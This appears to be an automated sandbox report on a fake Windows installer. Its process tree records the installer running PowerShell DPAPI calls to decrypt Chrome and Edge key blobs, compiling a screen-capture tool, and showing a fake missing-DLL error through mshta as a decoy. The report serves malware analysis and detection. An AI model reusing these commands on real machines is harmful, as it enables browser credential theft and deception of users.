                                                                                                                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                        No network behavior found

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:06:02:13
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:98'394'400 bytes
                                                                                                                                                                                                                        MD5 hash:FE0DDF8159F4A56D194F90E1FB31F3B2
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:06:02:47
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff64d4f0000
                                                                                                                                                                                                                        File size:186'389'504 bytes
                                                                                                                                                                                                                        MD5 hash:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:06:02:51
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:06:02:51
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:06:02:53
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
                                                                                                                                                                                                                        Imagebase:0x7ff64d4f0000
                                                                                                                                                                                                                        File size:186'389'504 bytes
                                                                                                                                                                                                                        MD5 hash:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:06:02:51
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:tasklist /fo csv
                                                                                                                                                                                                                        Imagebase:0x7ff63a2b0000
                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:06:02:54
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:06:02:54
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:06:02:54
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                        Imagebase:0x7ff63a2b0000
                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                        Start time:06:02:58
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3
                                                                                                                                                                                                                        Imagebase:0x7ff64d4f0000
                                                                                                                                                                                                                        File size:186'389'504 bytes
                                                                                                                                                                                                                        MD5 hash:F90856B824B429A51D390C25F21C9683
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:06:02:58
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:06:02:58
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:06:02:58
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
                                                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                        Start time:06:03:02
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                        Start time:06:03:02
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                        Start time:06:03:02
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
                                                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                        Start time:06:03:08
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                        Start time:06:03:08
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                        Start time:06:03:08
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
                                                                                                                                                                                                                        Imagebase:0x980000
                                                                                                                                                                                                                        File size:2'141'552 bytes
                                                                                                                                                                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
                                                                                                                                                                                                                        Imagebase:0x670000
                                                                                                                                                                                                                        File size:46'832 bytes
                                                                                                                                                                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
                                                                                                                                                                                                                        Imagebase:0x550000
                                                                                                                                                                                                                        File size:12'800 bytes
                                                                                                                                                                                                                        MD5 hash:18CDE4CFC9C121CC421152F9F86AED6B
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()""
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                        Imagebase:0x7ff63a2b0000
                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
                                                                                                                                                                                                                        Imagebase:0x7ff6f8a20000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                        Start time:06:03:09
                                                                                                                                                                                                                        Start date:24/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
